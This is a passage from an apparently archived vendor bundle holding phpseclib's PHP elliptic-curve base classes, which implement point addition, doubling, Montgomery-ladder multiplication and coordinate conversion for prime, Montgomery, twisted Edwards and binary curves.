= $m->multiply($y3)->subtract($this->eight->multiply($yyyy)); $z3 = $this->two->multiply($y1); return [$x3, $y3, $z3]; } /** * Tests whether or not the x / y values satisfy the equation * * @return boolean */ public function verifyPoint(array $p) { list($x, $y) = $p; $lhs = $y->multiply($y); $temp = $x->multiply($x)->multiply($x); $rhs = $temp->add($this->b); return $lhs->equals($rhs); } /** * Calculates the parameters needed from the Euclidean algorithm as discussed at * http://diamond.boisestate.edu/~liljanab/MATH308/GuideToECC.pdf#page=148 * * @param BigInteger $u * @param BigInteger $v * @return BigInteger[] */ protected static function extendedGCD(BigInteger $u, BigInteger $v) { $one = new BigInteger(1); $zero = new BigInteger(); $a = clone $one; $b = clone $zero; $c = clone $zero; $d = clone $one; $stop = $v->bitwise_rightShift($v->getLength() >> 1); $a1 = clone $zero; $b1 = clone $zero; $a2 = clone $zero; $b2 = clone $zero; $postGreatestIndex = 0; while (!$v->equals($zero)) { list($q) = $u->divide($v); $temp = $u; $u = $v; $v = $temp->subtract($v->multiply($q)); $temp = $a; $a = $c; $c = $temp->subtract($a->multiply($q)); $temp = $b; $b = $d; $d = $temp->subtract($b->multiply($q)); if ($v->compare($stop) > 0) { $a0 = $v; $b0 = $c; } else { $postGreatestIndex++; } if ($postGreatestIndex == 1) { $a1 = $v; $b1 = $c->negate(); } if ($postGreatestIndex == 2) { $rhs = $a0->multiply($a0)->add($b0->multiply($b0)); $lhs = $v->multiply($v)->add($b->multiply($b)); if ($lhs->compare($rhs) <= 0) { $a2 = $a0; $b2 = $b0->negate(); } else { $a2 = $v; $b2 = $c->negate(); } break; } } return [ ['a' => $a1, 'b' => $b1], ['a' => $a2, 'b' => $b2] ]; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/BaseCurves/Prime.php000064400000051701147600400120023174 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\BaseCurves; use phpseclib3\Common\Functions\Strings; use phpseclib3\Math\BigInteger; use phpseclib3\Math\Common\FiniteField\Integer; use phpseclib3\Math\PrimeField; use phpseclib3\Math\PrimeField\Integer as PrimeInteger; /** * Curves over y^2 = x^3 + a*x + b * * @author Jim Wigginton */ class Prime extends Base { /** * Prime Field Integer factory * * @var \phpseclib3\Math\PrimeFields */ protected $factory; /** * Cofficient for x^1 * * @var object */ protected $a; /** * Cofficient for x^0 * * @var object */ protected $b; /** * Base Point * * @var object */ protected $p; /** * The number one over the specified finite field * * @var object */ protected $one; /** * The number two over the specified finite field * * @var object */ protected $two; /** * The number three over the specified finite field * * @var object */ protected $three; /** * The number four over the specified finite field * * @var object */ protected $four; /** * The number eight over the specified finite field * * @var object */ protected $eight; /** * The modulo * * @var BigInteger */ protected $modulo; /** * The Order * * @var BigInteger */ protected $order; /** * Sets the modulo */ public function setModulo(BigInteger $modulo) { $this->modulo = $modulo; $this->factory = new PrimeField($modulo); $this->two = $this->factory->newInteger(new BigInteger(2)); $this->three = $this->factory->newInteger(new BigInteger(3)); // used by jacobian coordinates $this->one = $this->factory->newInteger(new BigInteger(1)); $this->four = $this->factory->newInteger(new BigInteger(4)); $this->eight = $this->factory->newInteger(new BigInteger(8)); } /** * Set coefficients a and b */ public function setCoefficients(BigInteger $a, BigInteger $b) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->a = $this->factory->newInteger($a); $this->b = $this->factory->newInteger($b); } /** * Set x and y coordinates for the base point * * @param BigInteger|PrimeInteger $x * @param BigInteger|PrimeInteger $y * @return PrimeInteger[] */ public function setBasePoint($x, $y) { switch (true) { case !$x instanceof BigInteger && !$x instanceof PrimeInteger: throw new \UnexpectedValueException('Argument 1 passed to Prime::setBasePoint() must be an instance of either BigInteger or PrimeField\Integer'); case !$y instanceof BigInteger && !$y instanceof PrimeInteger: throw new \UnexpectedValueException('Argument 2 passed to Prime::setBasePoint() must be an instance of either BigInteger or PrimeField\Integer'); } if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->p = [ $x instanceof BigInteger ? $this->factory->newInteger($x) : $x, $y instanceof BigInteger ? $this->factory->newInteger($y) : $y ]; } /** * Retrieve the base point as an array * * @return array */ public function getBasePoint() { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } /* if (!isset($this->p)) { throw new \RuntimeException('setBasePoint needs to be called before this method'); } */ return $this->p; } /** * Adds two "fresh" jacobian form on the curve * * @return FiniteField[] */ protected function jacobianAddPointMixedXY(array $p, array $q) { list($u1, $s1) = $p; list($u2, $s2) = $q; if ($u1->equals($u2)) { if (!$s1->equals($s2)) { return []; } else { return $this->doublePoint($p); } } $h = $u2->subtract($u1); $r = $s2->subtract($s1); $h2 = $h->multiply($h); $h3 = $h2->multiply($h); $v = $u1->multiply($h2); $x3 = $r->multiply($r)->subtract($h3)->subtract($v->multiply($this->two)); $y3 = $r->multiply( $v->subtract($x3) )->subtract( $s1->multiply($h3) ); return [$x3, $y3, $h]; } /** * Adds one "fresh" jacobian form on the curve * * The second parameter should be the "fresh" one * * @return FiniteField[] */ protected function jacobianAddPointMixedX(array $p, array $q) { list($u1, $s1, $z1) = $p; list($x2, $y2) = $q; $z12 = $z1->multiply($z1); $u2 = $x2->multiply($z12); $s2 = $y2->multiply($z12->multiply($z1)); if ($u1->equals($u2)) { if (!$s1->equals($s2)) { return []; } else { return $this->doublePoint($p); } } $h = $u2->subtract($u1); $r = $s2->subtract($s1); $h2 = $h->multiply($h); $h3 = $h2->multiply($h); $v = $u1->multiply($h2); $x3 = $r->multiply($r)->subtract($h3)->subtract($v->multiply($this->two)); $y3 = $r->multiply( $v->subtract($x3) )->subtract( $s1->multiply($h3) ); $z3 = $h->multiply($z1); return [$x3, $y3, $z3]; } /** * Adds two jacobian coordinates on the curve * * @return FiniteField[] */ protected function jacobianAddPoint(array $p, array $q) { list($x1, $y1, $z1) = $p; list($x2, $y2, $z2) = $q; $z12 = $z1->multiply($z1); $z22 = $z2->multiply($z2); $u1 = $x1->multiply($z22); $u2 = $x2->multiply($z12); $s1 = $y1->multiply($z22->multiply($z2)); $s2 = $y2->multiply($z12->multiply($z1)); if ($u1->equals($u2)) { if (!$s1->equals($s2)) { return []; } else { return $this->doublePoint($p); } } $h = $u2->subtract($u1); $r = $s2->subtract($s1); $h2 = $h->multiply($h); $h3 = $h2->multiply($h); $v = $u1->multiply($h2); $x3 = $r->multiply($r)->subtract($h3)->subtract($v->multiply($this->two)); $y3 = $r->multiply( $v->subtract($x3) )->subtract( $s1->multiply($h3) ); $z3 = $h->multiply($z1)->multiply($z2); return [$x3, $y3, $z3]; } /** * Adds two points on the curve * * @return FiniteField[] */ public function addPoint(array $p, array $q) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!count($p) || !count($q)) { if (count($q)) { return $q; } if (count($p)) { return $p; } return []; } // use jacobian coordinates if (isset($p[2]) && isset($q[2])) { if (isset($p['fresh']) && isset($q['fresh'])) { return $this->jacobianAddPointMixedXY($p, $q); } if (isset($p['fresh'])) { return $this->jacobianAddPointMixedX($q, $p); } if (isset($q['fresh'])) { return $this->jacobianAddPointMixedX($p, $q); } return $this->jacobianAddPoint($p, $q); } if (isset($p[2]) || isset($q[2])) { throw new \RuntimeException('Affine coordinates need to be manually converted to Jacobi coordinates or vice versa'); } if ($p[0]->equals($q[0])) { if (!$p[1]->equals($q[1])) { return []; } else { // eg. doublePoint list($numerator, $denominator) = $this->doublePointHelper($p); } } else { $numerator = $q[1]->subtract($p[1]); $denominator = $q[0]->subtract($p[0]); } $slope = $numerator->divide($denominator); $x = $slope->multiply($slope)->subtract($p[0])->subtract($q[0]); $y = $slope->multiply($p[0]->subtract($x))->subtract($p[1]); return [$x, $y]; } /** * Returns the numerator and denominator of the slope * * @return FiniteField[] */ protected function doublePointHelper(array $p) { $numerator = $this->three->multiply($p[0])->multiply($p[0])->add($this->a); $denominator = $this->two->multiply($p[1]); return [$numerator, $denominator]; } /** * Doubles a jacobian coordinate on the curve * * @return FiniteField[] */ protected function jacobianDoublePoint(array $p) { list($x, $y, $z) = $p; $x2 = $x->multiply($x); $y2 = $y->multiply($y); $z2 = $z->multiply($z); $s = $this->four->multiply($x)->multiply($y2); $m1 = $this->three->multiply($x2); $m2 = $this->a->multiply($z2->multiply($z2)); $m = $m1->add($m2); $x1 = $m->multiply($m)->subtract($this->two->multiply($s)); $y1 = $m->multiply($s->subtract($x1))->subtract( $this->eight->multiply($y2->multiply($y2)) ); $z1 = $this->two->multiply($y)->multiply($z); return [$x1, $y1, $z1]; } /** * Doubles a "fresh" jacobian coordinate on the curve * * @return FiniteField[] */ protected function jacobianDoublePointMixed(array $p) { list($x, $y) = $p; $x2 = $x->multiply($x); $y2 = $y->multiply($y); $s = $this->four->multiply($x)->multiply($y2); $m1 = $this->three->multiply($x2); $m = $m1->add($this->a); $x1 = $m->multiply($m)->subtract($this->two->multiply($s)); $y1 = $m->multiply($s->subtract($x1))->subtract( $this->eight->multiply($y2->multiply($y2)) ); $z1 = $this->two->multiply($y); return [$x1, $y1, $z1]; } /** * Doubles a point on a curve * * @return FiniteField[] */ public function doublePoint(array $p) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!count($p)) { return []; } // use jacobian coordinates if (isset($p[2])) { if (isset($p['fresh'])) { return $this->jacobianDoublePointMixed($p); } return $this->jacobianDoublePoint($p); } list($numerator, $denominator) = $this->doublePointHelper($p); $slope = $numerator->divide($denominator); $x = $slope->multiply($slope)->subtract($p[0])->subtract($p[0]); $y = $slope->multiply($p[0]->subtract($x))->subtract($p[1]); return [$x, $y]; } /** * Returns the X coordinate and the derived Y coordinate * * @return array */ public function derivePoint($m) { $y = ord(Strings::shift($m)); $x = new BigInteger($m, 256); $xp = $this->convertInteger($x); switch ($y) { case 2: $ypn = false; break; case 3: $ypn = true; break; default: throw new \RuntimeException('Coordinate not in recognized format'); } $temp = $xp->multiply($this->a); $temp = $xp->multiply($xp)->multiply($xp)->add($temp); $temp = $temp->add($this->b); $b = $temp->squareRoot(); if (!$b) { throw new \RuntimeException('Unable to derive Y coordinate'); } $bn = $b->isOdd(); $yp = $ypn == $bn ? $b : $b->negate(); return [$xp, $yp]; } /** * Tests whether or not the x / y values satisfy the equation * * @return boolean */ public function verifyPoint(array $p) { list($x, $y) = $p; $lhs = $y->multiply($y); $temp = $x->multiply($this->a); $temp = $x->multiply($x)->multiply($x)->add($temp); $rhs = $temp->add($this->b); return $lhs->equals($rhs); } /** * Returns the modulo * * @return \phpseclib3\Math\BigInteger */ public function getModulo() { return $this->modulo; } /** * Returns the a coefficient * * @return \phpseclib3\Math\PrimeField\Integer */ public function getA() { return $this->a; } /** * Returns the a coefficient * * @return \phpseclib3\Math\PrimeField\Integer */ public function getB() { return $this->b; } /** * Multiply and Add Points * * Adapted from: * https://github.com/indutny/elliptic/blob/725bd91/lib/elliptic/curve/base.js#L125 * * @return int[] */ public function multiplyAddPoints(array $points, array $scalars) { $length = count($points); foreach ($points as &$point) { $point = $this->convertToInternal($point); } $wnd = [$this->getNAFPoints($points[0], 7)]; $wndWidth = [isset($points[0]['nafwidth']) ? $points[0]['nafwidth'] : 7]; for ($i = 1; $i < $length; $i++) { $wnd[] = $this->getNAFPoints($points[$i], 1); $wndWidth[] = isset($points[$i]['nafwidth']) ? $points[$i]['nafwidth'] : 1; } $naf = []; // comb all window NAFs $max = 0; for ($i = $length - 1; $i >= 1; $i -= 2) { $a = $i - 1; $b = $i; if ($wndWidth[$a] != 1 || $wndWidth[$b] != 1) { $naf[$a] = $scalars[$a]->getNAF($wndWidth[$a]); $naf[$b] = $scalars[$b]->getNAF($wndWidth[$b]); $max = max(count($naf[$a]), count($naf[$b]), $max); continue; } $comb = [ $points[$a], // 1 null, // 3 null, // 5 $points[$b] // 7 ]; $comb[1] = $this->addPoint($points[$a], $points[$b]); $comb[2] = $this->addPoint($points[$a], $this->negatePoint($points[$b])); $index = [ -3, /* -1 -1 */ -1, /* -1 0 */ -5, /* -1 1 */ -7, /* 0 -1 */ 0, /* 0 -1 */ 7, /* 0 1 */ 5, /* 1 -1 */ 1, /* 1 0 */ 3 /* 1 1 */ ]; $jsf = self::getJSFPoints($scalars[$a], $scalars[$b]); $max = max(count($jsf[0]), $max); if ($max > 0) { $naf[$a] = array_fill(0, $max, 0); $naf[$b] = array_fill(0, $max, 0); } else { $naf[$a] = []; $naf[$b] = []; } for ($j = 0; $j < $max; $j++) { $ja = isset($jsf[0][$j]) ? $jsf[0][$j] : 0; $jb = isset($jsf[1][$j]) ? $jsf[1][$j] : 0; $naf[$a][$j] = $index[3 * ($ja + 1) + $jb + 1]; $naf[$b][$j] = 0; $wnd[$a] = $comb; } } $acc = []; $temp = [0, 0, 0, 0]; for ($i = $max; $i >= 0; $i--) { $k = 0; while ($i >= 0) { $zero = true; for ($j = 0; $j < $length; $j++) { $temp[$j] = isset($naf[$j][$i]) ? $naf[$j][$i] : 0; if ($temp[$j] != 0) { $zero = false; } } if (!$zero) { break; } $k++; $i--; } if ($i >= 0) { $k++; } while ($k--) { $acc = $this->doublePoint($acc); } if ($i < 0) { break; } for ($j = 0; $j < $length; $j++) { $z = $temp[$j]; $p = null; if ($z == 0) { continue; } $p = $z > 0 ? $wnd[$j][($z - 1) >> 1] : $this->negatePoint($wnd[$j][(-$z - 1) >> 1]); $acc = $this->addPoint($acc, $p); } } return $this->convertToAffine($acc); } /** * Precomputes NAF points * * Adapted from: * https://github.com/indutny/elliptic/blob/725bd91/lib/elliptic/curve/base.js#L351 * * @return int[] */ private function getNAFPoints(array $point, $wnd) { if (isset($point['naf'])) { return $point['naf']; } $res = [$point]; $max = (1 << $wnd) - 1; $dbl = $max == 1 ? null : $this->doublePoint($point); for ($i = 1; $i < $max; $i++) { $res[] = $this->addPoint($res[$i - 1], $dbl); } $point['naf'] = $res; /* $str = ''; foreach ($res as $re) { $re[0] = bin2hex($re[0]->toBytes()); $re[1] = bin2hex($re[1]->toBytes()); $str.= " ['$re[0]', '$re[1]'],\r\n"; } file_put_contents('temp.txt', $str); exit; */ return $res; } /** * Precomputes points in Joint Sparse Form * * Adapted from: * https://github.com/indutny/elliptic/blob/725bd91/lib/elliptic/utils.js#L96 * * @return int[] */ private static function getJSFPoints(Integer $k1, Integer $k2) { static $three; if (!isset($three)) { $three = new BigInteger(3); } $jsf = [[], []]; $k1 = $k1->toBigInteger(); $k2 = $k2->toBigInteger(); $d1 = 0; $d2 = 0; while ($k1->compare(new BigInteger(-$d1)) > 0 || $k2->compare(new BigInteger(-$d2)) > 0) { // first phase $m14 = $k1->testBit(0) + 2 * $k1->testBit(1); $m14 += $d1; $m14 &= 3; $m24 = $k2->testBit(0) + 2 * $k2->testBit(1); $m24 += $d2; $m24 &= 3; if ($m14 == 3) { $m14 = -1; } if ($m24 == 3) { $m24 = -1; } $u1 = 0; if ($m14 & 1) { // if $m14 is odd $m8 = $k1->testBit(0) + 2 * $k1->testBit(1) + 4 * $k1->testBit(2); $m8 += $d1; $m8 &= 7; $u1 = ($m8 == 3 || $m8 == 5) && $m24 == 2 ? -$m14 : $m14; } $jsf[0][] = $u1; $u2 = 0; if ($m24 & 1) { // if $m24 is odd $m8 = $k2->testBit(0) + 2 * $k2->testBit(1) + 4 * $k2->testBit(2); $m8 += $d2; $m8 &= 7; $u2 = ($m8 == 3 || $m8 == 5) && $m14 == 2 ? -$m24 : $m24; } $jsf[1][] = $u2; // second phase if (2 * $d1 == $u1 + 1) { $d1 = 1 - $d1; } if (2 * $d2 == $u2 + 1) { $d2 = 1 - $d2; } $k1 = $k1->bitwise_rightShift(1); $k2 = $k2->bitwise_rightShift(1); } return $jsf; } /** * Returns the affine point * * A Jacobian Coordinate is of the form (x, y, z). * To convert a Jacobian Coordinate to an Affine Point * you do (x / z^2, y / z^3) * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToAffine(array $p) { if (!isset($p[2])) { return $p; } list($x, $y, $z) = $p; $z = $this->one->divide($z); $z2 = $z->multiply($z); return [ $x->multiply($z2), $y->multiply($z2)->multiply($z) ]; } /** * Converts an affine point to a jacobian coordinate * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToInternal(array $p) { if (isset($p[2])) { return $p; } $p[2] = clone $this->one; $p['fresh'] = true; return $p; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/BaseCurves/Montgomery.php000064400000016330147600400120024257 0ustar00 * @copyright 2019 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\BaseCurves; use phpseclib3\Crypt\EC\Curves\Curve25519; use phpseclib3\Math\BigInteger; use phpseclib3\Math\PrimeField; use phpseclib3\Math\PrimeField\Integer as PrimeInteger; /** * Curves over y^2 = x^3 + a*x + x * * @author Jim Wigginton */ class Montgomery extends Base { /** * Prime Field Integer factory * * @var \phpseclib3\Math\PrimeField */ protected $factory; /** * Cofficient for x * * @var object */ protected $a; /** * Constant used for point doubling * * @var object */ protected $a24; /** * The Number Zero * * @var object */ protected $zero; /** * The Number One * * @var object */ protected $one; /** * Base Point * * @var object */ protected $p; /** * The modulo * * @var BigInteger */ protected $modulo; /** * The Order * * @var BigInteger */ protected $order; /** * Sets the modulo */ public function setModulo(BigInteger $modulo) { $this->modulo = $modulo; $this->factory = new PrimeField($modulo); $this->zero = $this->factory->newInteger(new BigInteger()); $this->one = $this->factory->newInteger(new BigInteger(1)); } /** * Set coefficients a */ public function setCoefficients(BigInteger $a) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->a = $this->factory->newInteger($a); $two = $this->factory->newInteger(new BigInteger(2)); $four = $this->factory->newInteger(new BigInteger(4)); $this->a24 = $this->a->subtract($two)->divide($four); } /** * Set x and y coordinates for the base point * * @param BigInteger|PrimeInteger $x * @param BigInteger|PrimeInteger $y * @return PrimeInteger[] */ public function setBasePoint($x, $y) { switch (true) { case !$x instanceof BigInteger && !$x instanceof PrimeInteger: throw new \UnexpectedValueException('Argument 1 passed to Prime::setBasePoint() must be an instance of either BigInteger or PrimeField\Integer'); case !$y instanceof BigInteger && !$y instanceof PrimeInteger: throw new \UnexpectedValueException('Argument 2 passed to Prime::setBasePoint() must be an instance of either BigInteger or PrimeField\Integer'); } if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->p = [ $x instanceof BigInteger ? $this->factory->newInteger($x) : $x, $y instanceof BigInteger ? $this->factory->newInteger($y) : $y ]; } /** * Retrieve the base point as an array * * @return array */ public function getBasePoint() { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } /* if (!isset($this->p)) { throw new \RuntimeException('setBasePoint needs to be called before this method'); } */ return $this->p; } /** * Doubles and adds a point on a curve * * See https://tools.ietf.org/html/draft-ietf-tls-curve25519-01#appendix-A.1.3 * * @return FiniteField[][] */ private function doubleAndAddPoint(array $p, array $q, PrimeInteger $x1) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!count($p) || !count($q)) { return []; } if (!isset($p[1])) { throw new \RuntimeException('Affine coordinates need to be manually converted to XZ coordinates'); } list($x2, $z2) = $p; list($x3, $z3) = $q; $a = $x2->add($z2); $aa = $a->multiply($a); $b = $x2->subtract($z2); $bb = $b->multiply($b); $e = $aa->subtract($bb); $c = $x3->add($z3); $d = $x3->subtract($z3); $da = $d->multiply($a); $cb = $c->multiply($b); $temp = $da->add($cb); $x5 = $temp->multiply($temp); $temp = $da->subtract($cb); $z5 = $x1->multiply($temp->multiply($temp)); $x4 = $aa->multiply($bb); $temp = static::class == Curve25519::class ? $bb : $aa; $z4 = $e->multiply($temp->add($this->a24->multiply($e))); return [ [$x4, $z4], [$x5, $z5] ]; } /** * Multiply a point on the curve by a scalar * * Uses the montgomery ladder technique as described here: * * https://en.wikipedia.org/wiki/Elliptic_curve_point_multiplication#Montgomery_ladder * https://github.com/phpecc/phpecc/issues/16#issuecomment-59176772 * * @return array */ public function multiplyPoint(array $p, BigInteger $d) { $p1 = [$this->one, $this->zero]; $alreadyInternal = isset($x[1]); $p2 = $this->convertToInternal($p); $x = $p[0]; $b = $d->toBits(); $b = str_pad($b, 256, '0', STR_PAD_LEFT); for ($i = 0; $i < strlen($b); $i++) { $b_i = (int) $b[$i]; if ($b_i) { list($p2, $p1) = $this->doubleAndAddPoint($p2, $p1, $x); } else { list($p1, $p2) = $this->doubleAndAddPoint($p1, $p2, $x); } } return $alreadyInternal ? $p1 : $this->convertToAffine($p1); } /** * Converts an affine point to an XZ coordinate * * From https://hyperelliptic.org/EFD/g1p/auto-montgom-xz.html * * XZ coordinates represent x y as X Z satsfying the following equations: * * x=X/Z * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToInternal(array $p) { if (empty($p)) { return [clone $this->zero, clone $this->one]; } if (isset($p[1])) { return $p; } $p[1] = clone $this->one; return $p; } /** * Returns the affine point * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToAffine(array $p) { if (!isset($p[1])) { return $p; } list($x, $z) = $p; return [$x->divide($z)]; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/BaseCurves/TwistedEdwards.php000064400000012564147600400120025061 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\BaseCurves; use phpseclib3\Math\BigInteger; use phpseclib3\Math\PrimeField; use phpseclib3\Math\PrimeField\Integer as PrimeInteger; /** * Curves over a*x^2 + y^2 = 1 + d*x^2*y^2 * * @author Jim Wigginton */ class TwistedEdwards extends Base { /** * The modulo * * @var BigInteger */ protected $modulo; /** * Cofficient for x^2 * * @var object */ protected $a; /** * Cofficient for x^2*y^2 * * @var object */ protected $d; /** * Base Point * * @var object[] */ protected $p; /** * The number zero over the specified finite field * * @var object */ protected $zero; /** * The number one over the specified finite field * * @var object */ protected $one; /** * The number two over the specified finite field * * @var object */ protected $two; /** * Sets the modulo */ public function setModulo(BigInteger $modulo) { $this->modulo = $modulo; $this->factory = new PrimeField($modulo); $this->zero = $this->factory->newInteger(new BigInteger(0)); $this->one = $this->factory->newInteger(new BigInteger(1)); $this->two = $this->factory->newInteger(new BigInteger(2)); } /** * Set coefficients a and b */ public function setCoefficients(BigInteger $a, BigInteger $d) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->a = $this->factory->newInteger($a); $this->d = $this->factory->newInteger($d); } /** * Set x and y coordinates for the base point */ public function setBasePoint($x, $y) { switch (true) { case !$x instanceof BigInteger && !$x instanceof PrimeInteger: throw new \UnexpectedValueException('Argument 1 passed to Prime::setBasePoint() must be an instance of either BigInteger or PrimeField\Integer'); case !$y instanceof BigInteger && !$y instanceof PrimeInteger: throw new \UnexpectedValueException('Argument 2 passed to Prime::setBasePoint() must be an instance of either BigInteger or PrimeField\Integer'); } if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->p = [ $x instanceof BigInteger ? $this->factory->newInteger($x) : $x, $y instanceof BigInteger ? $this->factory->newInteger($y) : $y ]; } /** * Returns the a coefficient * * @return \phpseclib3\Math\PrimeField\Integer */ public function getA() { return $this->a; } /** * Returns the a coefficient * * @return \phpseclib3\Math\PrimeField\Integer */ public function getD() { return $this->d; } /** * Retrieve the base point as an array * * @return array */ public function getBasePoint() { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } /* if (!isset($this->p)) { throw new \RuntimeException('setBasePoint needs to be called before this method'); } */ return $this->p; } /** * Returns the affine point * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToAffine(array $p) { if (!isset($p[2])) { return $p; } list($x, $y, $z) = $p; $z = $this->one->divide($z); return [ $x->multiply($z), $y->multiply($z) ]; } /** * Returns the modulo * * @return \phpseclib3\Math\BigInteger */ public function getModulo() { return $this->modulo; } /** * Tests whether or not the x / y values satisfy the equation * * @return boolean */ public function verifyPoint(array $p) { list($x, $y) = $p; $x2 = $x->multiply($x); $y2 = $y->multiply($y); $lhs = $this->a->multiply($x2)->add($y2); $rhs = $this->d->multiply($x2)->multiply($y2)->add($this->one); return $lhs->equals($rhs); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/BaseCurves/Binary.php000064400000023114147600400120023341 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\BaseCurves; use phpseclib3\Math\BigInteger; use phpseclib3\Math\BinaryField; use phpseclib3\Math\BinaryField\Integer as BinaryInteger; /** * Curves over y^2 + x*y = x^3 + a*x^2 + b * * @author Jim Wigginton */ class Binary extends Base { /** * Binary Field Integer factory * * @var \phpseclib3\Math\BinaryField */ protected $factory; /** * Cofficient for x^1 * * @var object */ protected $a; /** * Cofficient for x^0 * * @var object */ protected $b; /** * Base Point * * @var object */ protected $p; /** * The number one over the specified finite field * * @var object */ protected $one; /** * The modulo * * @var BigInteger */ protected $modulo; /** * The Order * * @var BigInteger */ protected $order; /** * Sets the modulo */ public function setModulo(...$modulo) { $this->modulo = $modulo; $this->factory = new BinaryField(...$modulo); $this->one = $this->factory->newInteger("\1"); } /** * Set coefficients a and b * * @param string $a * @param string $b */ public function setCoefficients($a, $b) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->a = $this->factory->newInteger(pack('H*', $a)); $this->b = $this->factory->newInteger(pack('H*', $b)); } /** * Set x and y coordinates for the base point * * @param string|BinaryInteger $x * @param string|BinaryInteger $y */ public function setBasePoint($x, $y) { switch (true) { case !is_string($x) && !$x instanceof BinaryInteger: throw new \UnexpectedValueException('Argument 1 passed to Binary::setBasePoint() must be a string or an instance of BinaryField\Integer'); case !is_string($y) && !$y instanceof BinaryInteger: throw new \UnexpectedValueException('Argument 2 passed to Binary::setBasePoint() must be a string or an instance of BinaryField\Integer'); } if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->p = [ is_string($x) ? $this->factory->newInteger(pack('H*', $x)) : $x, is_string($y) ? $this->factory->newInteger(pack('H*', $y)) : $y ]; } /** * Retrieve the base point as an array * * @return array */ public function getBasePoint() { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } /* if (!isset($this->p)) { throw new \RuntimeException('setBasePoint needs to be called before this method'); } */ return $this->p; } /** * Adds two points on the curve * * @return FiniteField[] */ public function addPoint(array $p, array $q) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!count($p) || !count($q)) { if (count($q)) { return $q; } if (count($p)) { return $p; } return []; } if (!isset($p[2]) || !isset($q[2])) { throw new \RuntimeException('Affine coordinates need to be manually converted to "Jacobi" coordinates or vice versa'); } if ($p[0]->equals($q[0])) { return !$p[1]->equals($q[1]) ? [] : $this->doublePoint($p); } // formulas from http://hyperelliptic.org/EFD/g12o/auto-shortw-jacobian.html list($x1, $y1, $z1) = $p; list($x2, $y2, $z2) = $q; $o1 = $z1->multiply($z1); $b = $x2->multiply($o1); if ($z2->equals($this->one)) { $d = $y2->multiply($o1)->multiply($z1); $e = $x1->add($b); $f = $y1->add($d); $z3 = $e->multiply($z1); $h = $f->multiply($x2)->add($z3->multiply($y2)); $i = $f->add($z3); $g = $z3->multiply($z3); $p1 = $this->a->multiply($g); $p2 = $f->multiply($i); $p3 = $e->multiply($e)->multiply($e); $x3 = $p1->add($p2)->add($p3); $y3 = $i->multiply($x3)->add($g->multiply($h)); return [$x3, $y3, $z3]; } $o2 = $z2->multiply($z2); $a = $x1->multiply($o2); $c = $y1->multiply($o2)->multiply($z2); $d = $y2->multiply($o1)->multiply($z1); $e = $a->add($b); $f = $c->add($d); $g = $e->multiply($z1); $h = $f->multiply($x2)->add($g->multiply($y2)); $z3 = $g->multiply($z2); $i = $f->add($z3); $p1 = $this->a->multiply($z3->multiply($z3)); $p2 = $f->multiply($i); $p3 = $e->multiply($e)->multiply($e); $x3 = $p1->add($p2)->add($p3); $y3 = $i->multiply($x3)->add($g->multiply($g)->multiply($h)); return [$x3, $y3, $z3]; } /** * Doubles a point on a curve * * @return FiniteField[] */ public function doublePoint(array $p) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!count($p)) { return []; } if (!isset($p[2])) { throw new \RuntimeException('Affine coordinates need to be manually converted to "Jacobi" coordinates or vice versa'); } // formulas from http://hyperelliptic.org/EFD/g12o/auto-shortw-jacobian.html list($x1, $y1, $z1) = $p; $a = $x1->multiply($x1); $b = $a->multiply($a); if ($z1->equals($this->one)) { $x3 = $b->add($this->b); $z3 = clone $x1; $p1 = $a->add($y1)->add($z3)->multiply($this->b); $p2 = $a->add($y1)->multiply($b); $y3 = $p1->add($p2); return [$x3, $y3, $z3]; } $c = $z1->multiply($z1); $d = $c->multiply($c); $x3 = $b->add($this->b->multiply($d->multiply($d))); $z3 = $x1->multiply($c); $p1 = $b->multiply($z3); $p2 = $a->add($y1->multiply($z1))->add($z3)->multiply($x3); $y3 = $p1->add($p2); return [$x3, $y3, $z3]; } /** * Returns the X coordinate and the derived Y coordinate * * Not supported because it is covered by patents. * Quoting https://www.openssl.org/docs/man1.1.0/apps/ecparam.html , * * "Due to patent issues the compressed option is disabled by default for binary curves * and can be enabled by defining the preprocessor macro OPENSSL_EC_BIN_PT_COMP at * compile time." * * @return array */ public function derivePoint($m) { throw new \RuntimeException('Point compression on binary 